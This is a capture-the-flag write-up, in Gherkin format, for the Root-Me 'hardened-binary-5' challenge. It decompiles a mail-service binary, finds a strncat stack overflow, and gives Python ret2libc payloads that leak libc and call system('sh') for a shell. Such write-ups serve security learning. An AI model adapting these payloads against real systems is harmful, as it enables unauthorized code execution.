## Version 2.0
## language: en

Feature: hardened-binary-5
  Site:
    root-me
  Category:
    app-systeme
  User:
    m'baku
  Goal:
    Get shell and read the password

  Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 18.04.5   |
    | gdb-pwndbg      | 1.1.0     |
    | VMware          | 15.5.6    |
    | Ghidra          | 9.1.2     |
    | Python          | 3.6.9     |
    | Windows         | 10        |

  Machine information:
    Given I am accessing the challenge through its URL
    When I visit the link
    Then I see the environment configuration
    """
    PIE: disabled
    Relro: enabled
    NX: enabled (heap and stack)
    ASLR: enabled
    SF: disabled
    SRC: disabled
    """

  Scenario: Success: Analyzing the binary and finding bugs
    Given the source code is not provided
    When I analyze the binary with Ghidra [evidences](mainprocess.png)
    And I notice a function that simulates an email service
    """
    void mainprocess(void)

    {
      int ret;
      undefined buff [1280];
      char command [64];
      int auth;

      auth = 1;
      helo(buff);
      do {
        if (auth < 1) {
          return;
        }

        fgets(command,0x40,stdin);
        ret = strncmp(command,"MAIL FROM:",10);
        if (ret == 0) {
          from(buff,command);
        }
        ret = strncmp(command,"RCPT TO:",8);
        if (ret == 0) {
          rcptto(buff,command);
        }
        ret = strncmp(command,"DATA",4);
        if (ret == 0) {
          getdata(buff);
        }
        ret = strncmp(command,"QUIT",4);
      } while (ret != 0);
      puts("221 BBQ.FTW Service closing transmission channel");
      fflush(stdout);
                     /* WARNING: Subroutine does not return */
      exit(0);
    }
    """
    And in this function I can see that the return is conditioned
    """
    if (auth < 1) {
      return;
    }
    """
    Then if it is not, it will remain in a loop unless "QUIT" is typed
    When I analyzed its internal functions
    And I notice a function called "getdata" [evidences](function.png)
    """
    void getdata(int _buff)

    {
      size_t len;
      char local_buff [1032];

      puts("354 Start mail input; end with <CRLF>.<CRLF");
      fflush(stdout);
      memcpy((void *)(_buff + 0x100),"Here is the body of your mail :\n",0x21);
      do {
        fgets(local_buff,0x400,stdin);
        if (local_buff[0] == '.') {
          len = strlen(local_buff);
          if (len == 2) {
            puts("250 OK");
            fflush(stdout);
            return;
          }
        }
        strncat((char *)(_buff + 0x100),local_buff,0x400);
      } while( true );
    }
    """
    And here is a bug that becomes vulnerability for misuse of the strncat()
    """
    The  strcat()  function  appends the src string to the dest string,
    overwriting the terminating null byte ('\0') at the end of dest, and
    then adds a  terminating  null byte.   The strings may not overlap, and
    the dest string must have enough space for the result.  If dest is not
    large enough, program behavior is unpredictable; buffer overruns are a
    favorite avenue for attacking secure programs.
    """
    Then this is summarized in a buffer overflow for being tied to a loop
    """
    do {
      fgets(local_buff,0x400,stdin);
      ...
      ...
      strncat((char *)(_buff + 0x100),local_buff,0x400);
    } while( true );
    """

  Scenario: Success: Leaking Libc
    Given the binary is vulnerable to Stack Buffer Overflow
    When my first idea to exploit it is doing ret2libc
    And for that I need to leak Libc pointers
    Then I used Python for that
    """
    puts_plt = 0x080484DC
    puts_got = 0x8049ff0
    main = 0x80489bd

    payload = b''
    payload += b'A' * 0x420 # offsets
    payload += b'\xff\xff\xff\xff' # auth
    payload += b'B' * 0xc
    payload += p32(puts_plt) # return
    payload += p32(main)
    payload += p32(puts_got)

    p.sendline(payload)
    p.sendline(b'.')

    p.recvline()
    leak_puts = u32(p.recvline()[:4].ljust(4, b'\x00'))
    libc = leak_puts - 0x67c10
    system = libc + 0x3d250
    print ("puts() @ 0x%.4x" % leak_puts)
    print ("Libc @ 0x%.4x" % libc)
    print ("system() @ 0x%.4x" % system)
    """

  Scenario: Success: Getting shell
    Given I got Libc leaks
    When the following is to call "system('/bin/sh')"
    And for that I need a pointer to the string "sh"
    """
    pwndbg> search sh
    ch25            0x8048321 jae    0x804838b /* 'sh' */
    ch25            0x8049321 0x65006873 /* 'sh' */
    libc-2.27.so    0xf7cf06d2 jae    0xf7cf073c /* 'shell' */
    libc-2.27.so    0xf7cf0a16 jae    0xf7cf0a80 /* 'shell' */
    libc-2.27.so    0xf7cf0c8b jae    0xf7cf0cf5 /* 'share' */
    libc-2.27.so    0xf7cf0cd3 jae    0xf7cf0d3d /* 'sh' */
    libc-2.27.so    0xf7cf0d32 jae    0xf7cf0d9c /* 'sh' */
    libc-2.27.so    0xf7cf1234 jae    0xf7cf129e /* 'sh_all_linebuffered' */
    libc-2.27.so    0xf7cf1ac9 jae    0xf7cf1b33 /* 'shell' */
    libc-2.27.so    0xf7cf1e59 jae    0xf7cf1ec3 /* 'sh' */
    libc-2.27.so    0xf7cf1f12 jae    0xf7cf1f7c /* 'sh_all' */
    libc-2.27.so    0xf7cf24ac jae    0xf7cf2516 /* 'sh' */
    libc-2.27.so    0xf7cf2ec7 jae    0xf7cf2f31 /* 'shmat' */
    libc-2.27.so    0xf7cf30dc jae    0xf7cf3146 /* 'shlbf'
    """
    When I got the string the following is to perform the process again
    And call "system('sh')"
    """
    payload = b''
    payload += b'A' * 0x420
    payload += b'\xff\xff\xff\xff'
    payload += b'B' * 0xc
    payload += p32(system) # return
    payload += p32(main)
    payload += p32(sh_string) # system('sh')

    p.sendline(payload)
    p.sendline(b'.')
    """
    Then in this way I managed to exploit the binary [evidences](pwned.png)
